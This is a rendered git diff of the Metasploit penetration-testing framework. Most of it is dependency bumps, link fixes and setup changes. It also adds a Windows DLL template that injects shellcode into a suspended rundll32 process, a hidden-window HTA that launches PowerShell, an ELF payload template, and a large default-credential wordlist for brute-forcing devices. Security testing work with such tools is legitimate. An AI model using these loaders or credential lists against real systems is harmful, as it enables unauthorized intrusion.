@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD"
rex-random_identifier, 0.1.2, "New BSD" rex-random_identifier, 0.1.2, "New BSD"
rex-registry, 0.1.3, "New BSD" rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD" rex-rop_builder, 0.1.3, "New BSD"
rex-socket, 0.1.6, "New BSD" rex-socket, 0.1.8, "New BSD"
rex-sslscan, 0.1.4, "New BSD" rex-sslscan, 0.1.4, "New BSD"
rex-struct2, 0.1.2, "New BSD" rex-struct2, 0.1.2, "New BSD"
rex-text, 0.2.15, "New BSD" rex-text, 0.2.15, "New BSD"
rex-zip, 0.1.3, "New BSD" rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT robots, 0.10.1, MIT
rspec, 3.6.0, MIT
rspec-core, 3.6.0, MIT rspec-core, 3.6.0, MIT
rspec-expectations, 3.6.0, MIT rspec-expectations, 3.6.0, MIT
rspec-mocks, 3.6.0, MIT rspec-mocks, 3.6.0, MIT
rspec-rails, 3.6.0, MIT rspec-rails, 3.6.0, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.6.0, MIT rspec-support, 3.6.0, MIT
ruby_smb, 0.0.17, "New BSD" ruby-rc4, 0.1.5, MIT
ruby_smb, 0.0.18, "New BSD"
rubyntlm, 0.6.2, MIT rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD" rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT sawyer, 0.8.1, MIT
shoulda-matchers, 3.1.1, MIT
signet, 0.7.3, "Apache 2.0" signet, 0.7.3, "Apache 2.0"
simplecov, 0.14.1, MIT simplecov, 0.14.1, MIT
simplecov-html, 0.10.1, MIT simplecov-html, 0.10.1, MIT
@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD"
sshkey, 1.9.0, MIT sshkey, 1.9.0, MIT
thor, 0.19.4, MIT thor, 0.19.4, MIT
thread_safe, 0.3.6, "Apache 2.0" thread_safe, 0.3.6, "Apache 2.0"
timecop, 0.8.1, MIT timecop, 0.9.1, MIT
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.3, MIT tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT tzinfo-data, 1.2017.2, MIT
windows_error, 0.1.2, BSD windows_error, 0.1.2, BSD
xdr, 2.0.0, "Apache 2.0"
xmlrpc, 0.3.0, ruby xmlrpc, 0.3.0, ruby
xpath, 2.1.0, MIT
yard, 0.9.9, MIT yard, 0.9.9, MIT

View File

@ -14,13 +14,12 @@ New bugs and feature requests should be directed to:
API documentation for writing modules can be found at: API documentation for writing modules can be found at:
https://rapid7.github.io/metasploit-framework/api https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to: Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Installing Installing
-- --
Generally, you should use [the free installer](https://www.metasploit.com/download), Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
which contains all of the dependencies and will get you up and running with a which contains all of the dependencies and will get you up and running with a
few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
you'd like to deal with dependencies on your own. you'd like to deal with dependencies on your own.

View File

@ -11,6 +11,7 @@ Metasploit::Framework::Require.optionally_active_record_railtie
begin begin
require 'rspec/core' require 'rspec/core'
require 'rspec-rerun/tasks'
rescue LoadError rescue LoadError
puts "rspec not in bundle, so can't set up spec tasks. " \ puts "rspec not in bundle, so can't set up spec tasks. " \
"To run specs ensure to install the development and test groups." "To run specs ensure to install the development and test groups."

9
Vagrantfile vendored
View File

@ -3,10 +3,7 @@
Vagrant.configure(2) do |config| Vagrant.configure(2) do |config|
config.ssh.forward_x11 = true config.ssh.forward_x11 = true
config.vm.box = "ubuntu/trusty64" config.vm.box = "ubuntu/xenial64"
# TODO: find a minimal image that keeps up-to-date and
# supports multiple providers
#config.vm.box = "phusion/ubuntu-14.04-amd64"
config.vm.network :forwarded_port, guest: 4444, host: 4444 config.vm.network :forwarded_port, guest: 4444, host: 4444
config.vm.provider "vmware" do |v| config.vm.provider "vmware" do |v|
v.memory = 2048 v.memory = 2048
@ -26,14 +23,14 @@ Vagrant.configure(2) do |config|
[ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images [ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
"apt-get update", "apt-get update",
"apt-get dist-upgrade -y", "apt-get dist-upgrade -y",
"apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg fortune postgresql postgresql-contrib", "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
].each do |step| ].each do |step|
config.vm.provision "shell", inline: step config.vm.provision "shell", inline: step
end end
[ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3", [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
"curl -L https://get.rvm.io | bash -s stable", "curl -L https://get.rvm.io | bash -s stable",
"source ~/.rvm/scripts/rvm && cd /vagrant && rvm --install .ruby-version", "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
"source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler", "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
"source ~/.rvm/scripts/rvm && cd /vagrant && bundle", "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
"mkdir -p ~/.msf4", "mkdir -p ~/.msf4",

View File

@ -0,0 +1,16 @@
#!/bin/sh
rm -f *.o *.dll
CCx86="i686-w64-mingw32"
CCx64="x86_64-w64-mingw32"
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
${CCx64}-strip -s temp.dll -o template_x64_windows.dll
rm -f temp.dll *.o
${CCx86}-gcc -c -Os template.c -Wall -shared
${CCx86}-dllwrap --def template.def *.o -o temp.dll
${CCx86}-strip -s temp.dll -o template_x86_windows.dll
rm -f temp.dll *.o

View File

@ -0,0 +1,95 @@
// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
// - removed ExitThread(0) to prevent an Explorer crash
// - added Mutex to prevent invoking payload multiple times (at least try)
#include <windows.h>
#include "template.h"
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
void ExecutePayload(void);
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
void ExecutePayload(void)
{
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
LPVOID ep;
HANDLE hMutex;
SECURITY_ATTRIBUTES MutexAttributes;
inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
MutexAttributes.nLength = sizeof(MutexAttributes);
MutexAttributes.bInheritHandle = TRUE; // inherit the handle
hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
if(hMutex == NULL)
{
return;
}
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
CloseHandle(hMutex);
return;
}
if(GetLastError() == ERROR_ACCESS_DENIED)
{
CloseHandle(hMutex);
return;
}
// Start up the payload in a new process
inline_bzero(&si, sizeof(si));
si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread, &ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
CloseHandle(hMutex);
}

View File

@ -0,0 +1,3 @@
EXPORTS
DllMain@12

View File

@ -0,0 +1,3 @@
#define SCSIZE 2048
unsigned char code[SCSIZE] = "PAYLOAD:";

View File

@ -0,0 +1,18 @@
LANGUAGE 9, 1
VS_VERSION_INFO VERSIONINFO
FILEVERSION 0,0,0,1
PRODUCTVERSION 0,0,0,1
FILEFLAGSMASK 0x17L
FILEFLAGS 0x0L
FILEOS 0x4L
FILETYPE 0x2L
FILESUBTYPE 0x0L
BEGIN
END
#define RT_HTML 23

Binary file not shown.

Binary file not shown.

View File

@ -88,7 +88,7 @@ class SnifferSMB < BaseProtocolParser
return "NTLMv1" return "NTLMv1"
end end
else else
raise RuntimeError, "Unknow hash type" raise RuntimeError, "Unknown hash type"
end end
end end

View File

@ -15,5 +15,5 @@
| %bld[ OK ]%clr | | %bld[ OK ]%clr |
|______________________________________________________________________________| |______________________________________________________________________________|
| | | |
| http://metasploit.com | | https://metasploit.com |
|______________________________________________________________________________|%clr |______________________________________________________________________________|%clr

View File

@ -18,4 +18,4 @@
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr %bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr %bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr %bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr%bld http://metasploit.com %clr%bld https://metasploit.com

View File

@ -27,4 +27,4 @@
################################################################################ ################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################ ################################################################################
http://metasploit.com%clr https://metasploit.com%clr

View File

@ -27,4 +27,4 @@
# # ### # # ## # # ### # # ##
######################## ########################
## ## ## ## ## ## ## ##
http://metasploit.com%clr https://metasploit.com%clr

View File

@ -1,7 +1,7 @@
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%% %% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

View File

@ -23,4 +23,4 @@
; ,''-,;' ``- ; ,''-,;' ``-
``-..__``--` ``-..__``--`
http://metasploit.com%clr https://metasploit.com%clr

View File

@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
msf <%= mod.type %>(<%= mod.shortname %>) > exploit msf <%= mod.type %>(<%= mod.shortname %>) > exploit
``` ```
Other examples of setting the RHSOTS option: Other examples of setting the RHOSTS option:
Example 1: Example 1:

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

Binary file not shown.

Binary file not shown.

View File

@ -1,8 +1,12 @@
<script language="VBScript"> <script language="VBScript">
window.moveTo -4000, -4000
Set %{var_shell} = CreateObject("Wscript.Shell") Set %{var_shell} = CreateObject("Wscript.Shell")
Set %{var_fso} = CreateObject("Scripting.FileSystemObject") Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
If %{var_fso}.FileExists(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%") + "..\powershell.exe") Then For each path in Split(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%"),";")
%{var_shell}.Run "%{powershell}",0 If %{var_fso}.FileExists(path + "\..\powershell.exe") Then
End If %{var_shell}.Run "%{powershell}",0
Exit For
End If
Next
window.close() window.close()
</script> </script>

View File

@ -0,0 +1,41 @@
; build with:
; nasm elf_aarch64_template.s -f bin -o template_aarch64_linux.bin
BITS 64
org 0
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 2 ; e_type = ET_EXEC for an executable
dw 0xB7 ; e_machine = AARCH64
dd 0 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
global _start
_start:

Binary file not shown.

View File

@ -188,7 +188,7 @@
</div> </div>
</div> </div>
<div class="footer"> <div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center> <center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div> </div>
</body> </body>
</html> </html>

View File

@ -195,7 +195,7 @@
</div> </div>
<div class="footer"> <div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center> <center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div> </div>
</body> </body>

View File

@ -1,70 +1,100 @@
root ADMINISTRATOR ADMINISTRATOR
ADMN admn
Admin admin
Administrator
Administrator 3ware
Administrator admin
Administrator changeme
Administrator ganteng
Administrator letmein
Administrator password
Administrator pilou
Administrator smcadmin
Any 12345
CSG SESAME
Cisco Cisco
D-Link D-Link
DTA TJM
GEN1 gen1
GEN2 gen2
GlobalAdmin GlobalAdmin
HTTP HTTP
IntraStack Asante
IntraSwitch Asante
JDE JDE
LUCENT01 UI-PSWD-01
LUCENT02 UI-PSWD-02
MDaemon MServer
MICRO RSX
Manager Manager
Manager friend
NAU NAU
NETWORK NETWORK
NICONEX NICONEX
PBX PBX
PFCUser 240653C9467E45
PRODDTA PRODDTA
PSEAdmin $secure$
PlcmSpIp PlcmSpIp
Polycom SpIp
RMUser1 password
SYSADM sysadm
Sweex Mysweex
USERID PASSW0RD
User Password
VNC winterm
VTech VTech
ZXDSL ZXDSL
acc acc
adfexc adfexc
adm
admin admin
guest
root root
root password
root 1234
root 12345
root 123456
root 3ep5w2u
root admin
root Admin
root admin_1
root alpine
root ascend
root attack
root blender
root calvin
root changeme
root Cisco
root cms500
root davox
root default
root fivranne
root ggdaseuaimhrke
root iDirect
root letacla
root Mau'dib
root pass
root permit
root ROOT500
root tini
root tslinux
root wyse
ro ro
router router
rwa rwa
rw rw
ubnt ubnt
guest guest
guest User
admin 0 admin 0
admin 0000 admin 0000
admin 1111 admin 1111
admin 11111111
admin 123 admin 123
admin 1234 admin 1234
admin 123456 admin 123456
admin 1234567890
admin 1234admin admin 1234admin
admin 2222 admin 2222
admin 22222 admin 22222
admin2 changeme
admin 3477 admin 3477
admin 3ascotel admin 3ascotel
admin 7ujMko0admin
admin 7ujMko0vizxv
admin 9999 admin 9999
admin Admin
admin AitbISP4eCiG
admin Ascend
admin BRIDGE
admin Intel
admin MiniAP
admin NetCache
admin NetICs
admin OCS
admin P@55w0rd!
admin PASSWORD
admin Protector
admin SMDR
admin SUPER
admin Symbol
admin TANDBERG
admin _Cisco
admin access admin access
admin admin admin admin
admin Admin admin admin117.35.97.74
Admin admin
admin admin123 admin admin123
admin admin1234
admin administrator
admin adminttd admin adminttd
admin adslolitec admin adslolitec
admin adslroot admin adslroot
admin adtran admin adtran
admin AitbISP4eCiG
admin articon admin articon
admin asante admin asante
admin ascend admin ascend
admin Ascend
admin asd admin asd
admin atc123 admin atc123
admin atlantis admin atlantis
@ -72,11 +102,9 @@ admin backdoor
admin barricade admin barricade
admin barricadei admin barricadei
admin bintec admin bintec
admin BRIDGE
admin cableroot admin cableroot
admin changeme admin changeme
admin cisco admin cisco
admin _Cisco
admin comcomcom admin comcomcom
admin conexant admin conexant
admin default admin default
@ -84,96 +112,79 @@ admin diamond
admin enter admin enter
admin epicrouter admin epicrouter
admin extendnet admin extendnet
admin fliradmin
admin giraff admin giraff
admin hagpolm1 admin hagpolm1
admin hello admin hello
admin help admin help
admin hp.com admin hp.com
admin Intel
admin ironport admin ironport
admin isee admin isee
acc acc admin jvc
adfexc adfexc
adm
admin kont2004 admin kont2004
admin letmein admin letmein
admin leviton admin leviton
admin linga admin linga
admin meinsma
admin michaelangelo
admin michelangelo admin michelangelo
admin microbusiness admin microbusiness
admin MiniAP
admin motorola admin motorola
admin mu admin mu
admin my_DEMARC admin my_DEMARC
admin netadmin admin netadmin
admin NetCache
admin NetICs
admin noway admin noway
admin OCS admin oelinux123
admin operator admin operator
admin P@55w0rd!
admin password
admin p-assword admin p-assword
admin PASSWORD admin pass
admin password
admin passwort admin passwort
admin pento admin pento
admin pfsense admin pfsense
admin private admin private
admin Protector
admin public admin public
admin pwp admin pwp
admin radius admin radius
admin rmnetlm admin rmnetlm
admin root admin root
admin secure admin secure
admin service
admin setup admin setup
admin sitecom admin sitecom
admin smallbusiness admin smallbusiness
admin smcadmin admin smcadmin
admin SMDR
admin speedxess admin speedxess
admin SUPER
admin superuser admin superuser
admin support
admin switch admin switch
admin Symbol
admin synnet admin synnet
admin sysAdmin admin sysAdmin
admin system admin system
admin TANDBERG admin tech
admin ubnt
admin visual admin visual
admin w2402 admin w2402
admin xad$|#12 admin wbox
admin xad$l#12 admin xad$l#12
admin xad$|#12
admin zoomadsl admin zoomadsl
system change_on_install admin2 changeme
system/manager sys/change_on_install administrator administrator
system password administrator changeme
system sys adminstat OCS
adminstrator changeme
adminttd adminttd adminttd adminttd
adminuser OCS adminuser OCS
adminview OCS adminview OCS
adminstat OCS alpine alpine
adminstrator changeme
Administrator 3ware
Administrator admin
administrator administrator
ADMINISTRATOR ADMINISTRATOR
administrator changeme
Administrator changeme
Administrator ganteng
Administrator letmein
Administrator password
Administrator pilou
Administrator smcadmin
ADMN admn
ami ami
anonymous any@
anonymous Exabyte anonymous Exabyte
Any 12345 anonymous any@
apc apc apc apc
at4400 at4400 at4400 at4400
bbsd-client changeme2
bbsd-client NULL bbsd-client NULL
bbsd-client changeme2
bciim bciimpw bciim bciimpw
bcim bcimpw bcim bcimpw
bcms bcmspw bcms bcmspw
@ -191,7 +202,6 @@ cellit cellit
cgadmin cgadmin cgadmin cgadmin
cisco cisco
cisco cisco cisco cisco
Cisco Cisco
citel citel citel citel
client client client client
cmaker cmaker cmaker cmaker
@ -201,15 +211,19 @@ craft
craft craft craft craft
craft craftpw craft craftpw
craft crftpw craft crftpw
CSG SESAME
cusadmin highspeed cusadmin highspeed
cust custpw cust custpw
customer customer
customer none customer none
dadmin dadmin01 dadmin dadmin01
daemon
davox davox davox davox
debug d.e.b.u.g debug d.e.b.u.g
debug synnet debug synnet
default
default antslq
default default
default password
deskalt password deskalt password
deskman changeme deskman changeme
desknorm password desknorm password
@ -220,41 +234,39 @@ dhs3pms dhs3pms
diag danger diag danger
diag switch diag switch
disttech 4tas disttech 4tas
D-Link D-Link
draytek 1234 draytek 1234
DTA TJM
e250 e250changeme e250 e250changeme
e500 e500changeme e500 e500changeme
echo echo
echo User echo User
echo echo
enable enable
eng engineer eng engineer
enquiry enquirypw enquiry enquirypw
field support field support
GEN1 gen1 guest
GEN2 gen2 guest 1111
GlobalAdmin GlobalAdmin guest 12345
guest 123456
guest User
guest guest
guest xc3511
halt tlah halt tlah
helpdesk OCS helpdesk OCS
hsa hsadb hsa hsadb
hscroot abc123 hscroot abc123
HTTP HTTP
hydrasna hydrasna
iclock timely iclock timely
images images images images
inads inads inads inads
inads indspw inads indspw
init initpw init initpw
installer installer
install llatsni install llatsni
install secret install secret
installer installer
intel intel intel intel
intermec intermec intermec intermec
intermec intermec1QTPS intermec intermec1QTPS
IntraStack Asante
IntraSwitch Asante
jagadmin jagadmin
JDE JDE
kermit kermit kermit kermit
l2 l2 l2 l2
l3 l3 l3 l3
@ -266,8 +278,6 @@ login access
login admin login admin
login password login password
lp lp lp lp
LUCENT01 UI-PSWD-01
LUCENT02 UI-PSWD-02
m1122 m1122 m1122 m1122
mac mac
maint maint maint maint
@ -278,50 +288,41 @@ manage !manage
manager admin manager admin
manager change_on_install manager change_on_install
manager friend manager friend
Manager friend
manager manager manager manager
Manager Manager
manager sys manager sys
manuf xxyyzz manuf xxyyzz
MDaemon MServer
mediator mediator mediator mediator
MICRO RSX mg3500 merlin
mlusr mlusr mlusr mlusr
monitor monitor monitor monitor
mother fucker
mtch mtch mtch mtch
mtcl mtcl
mtcl mtcl mtcl mtcl
naadmin naadmin naadmin naadmin
NAU NAU
netangr attack netangr attack
netman netman
netman netman netman netman
netopia netopia netopia netopia
netrangr attack netrangr attack
netscreen netscreen netscreen netscreen
NETWORK NETWORK
NICONEX NICONEX
nms nmspw nms nmspw
nokai nokai nokai nokai
nokia nokia nokia nokia
none 0 none 0
none admin none admin
operator
operator 1234
operator $chwarzepumpe
operator operator
op op op op
op operator op operator
operator
operator $chwarzepumpe
operator 1234
operator operator
oracle oracle
patrol patrol patrol patrol
PBX PBX
PFCUser 240653C9467E45
piranha piranha piranha piranha
piranha q piranha q
pmd pmd
poll tech poll tech
Polycom SpIp
PRODDTA PRODDTA
PSEAdmin $secure$
public public
public public public public
radware radware radware radware
@ -331,7 +332,89 @@ readonly lucenttech2
readwrite lucenttech1 readwrite lucenttech1
recovery recovery recovery recovery
replicator replicator replicator replicator
RMUser1 password ro ro
root
root 000000
root 1111
root 1234
root 12345
root 123456
root 1234567890
root 1234qwer
root 123qwe
root 1q2w3e4r5
root 3ep5w2u
root 54321
root 666666
root 7ujMko0admin
root 7ujMko0vizxv
root 888888
root Admin
root Cisco
root GMB182
root LSiuY7pOmZG2s
root Mau'dib
root PASSWORD
root ROOT500
root Serv4EMC
root Zte521
root abc123
root admin
root admin1234
root admin_1
root ahetzip8
root alpine
root anko
root antslq
root ascend
root attack
root avtech
root b120root
root bananapi
root blender
root calvin
root changeme
root cms500
root comcom
root coolphoenix579
root davox
root default
root dreambox
root fivranne
root ggdaseuaimhrke
root hi3518
root iDirect
root ikwb
root ikwd
root jauntech
root juantech
root jvbzd
root klv123
root klv1234
root letacla
root maxided
root oelinux123
root openssh
root openvpnas
root orion99
root pa55w0rd
root pass
root password
root permit
root realtek
root root
root tini
root tslinux
root user
root vizxv
root wyse
root xc3511
root xmhdipc
root zlxx.
root zte9x15
router router
rw rw
rwa rwa
sa sa
scmadmin scmchangeme scmadmin scmchangeme
scout scout scout scout
@ -346,44 +429,55 @@ smc smcadmin
spcl 0 spcl 0
storwatch specialist storwatch specialist
stratacom stratauser stratacom stratauser
su super
super 5777364 super 5777364
super super
super surt
super.super
super.super master
superadmin secret superadmin secret
superman 21241036 superman 21241036
superman talent superman talent
super super
super.super
super.super master
super surt
superuser superuser
superuser 123456 superuser 123456
superuser admin superuser admin
supervisor PlsChgMe! supervisor PlsChgMe!
supervisor PlsChgMe1 supervisor PlsChgMe1
supervisor supervisor supervisor supervisor
supervisor zyad1234
support 123
support 1234
support 12345
support 123456
support admin
support h179350 support h179350
support login
support support support support
support supportpw support supportpw
su super support zlxx.
Sweex Mysweex sys uplink
sysadm Admin sysadm Admin
sysadm PASS
sysadm anicust sysadm anicust
sysadm sysadm
sysadmin PASS sysadmin PASS
sysadmin password sysadmin password
sysadmin sysadmin sysadmin sysadmin
sysadm PASS system change_on_install
sysadm sysadm system password
SYSADM sysadm system sys
sys uplink system/manager sys/change_on_install
target password target password
teacher password teacher password
tech tech
tech ANYCOM tech ANYCOM
tech field
tech ILMI tech ILMI
tech field
tech tech tech tech
telco telco telco telco
telecom telecom telecom telecom
tellabs tellabs#1 tellabs tellabs#1
telnet telnet
temp1 password temp1 password
test test test test
tiara tiaranet tiara tiaranet
@ -391,19 +485,17 @@ tiger tiger123
topicalt password topicalt password
topicnorm password topicnorm password
topicres password topicres password
ubnt ubnt
user user
USERID PASSW0RD user 123456
user pass user pass
user password user password
User Password
user public user public
user tivonpw user tivonpw
user user user user
vcr NetVCR vcr NetVCR
VNC winterm
volition volition volition volition
vt100 public vt100 public
VTech VTech
webadmin 1234 webadmin 1234
webadmin webadmin webadmin webadmin
websecadm changeme websecadm changeme
@ -412,4 +504,3 @@ wradmin trancell
write private write private
xd xd xd xd
xxx cascade xxx cascade
ZXDSL ZXDSL

View File

@ -4,7 +4,7 @@ services:
image: metasploit image: metasploit
build: build:
context: . context: .
dockerfile: ./docker/Dockerfile dockerfile: ./Dockerfile
environment: environment:
DATABASE_URL: postgres://postgres@db:5432/msf DATABASE_URL: postgres://postgres@db:5432/msf
links: links:

View File

@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then
MSF_PATH=$(dirname $(dirname $path)) MSF_PATH=$(dirname $(dirname $path))
fi fi
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml build
fi
cd $MSF_PATH cd $MSF_PATH
docker-compose run --rm --service-ports ms ./msfvenom "$@" docker-compose run --rm --service-ports ms ./msfvenom "$@"

26
docker/bin/msfvenom-dev Executable file
View File

@ -0,0 +1,26 @@
#! /bin/bash
if [[ -z "$MSF_PATH" ]]; then
path=`dirname $0`
# check for ./docker/msfconsole.rc
if [[ ! -f $path/../msfconsole.rc ]] ; then
# we are not inside the project
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
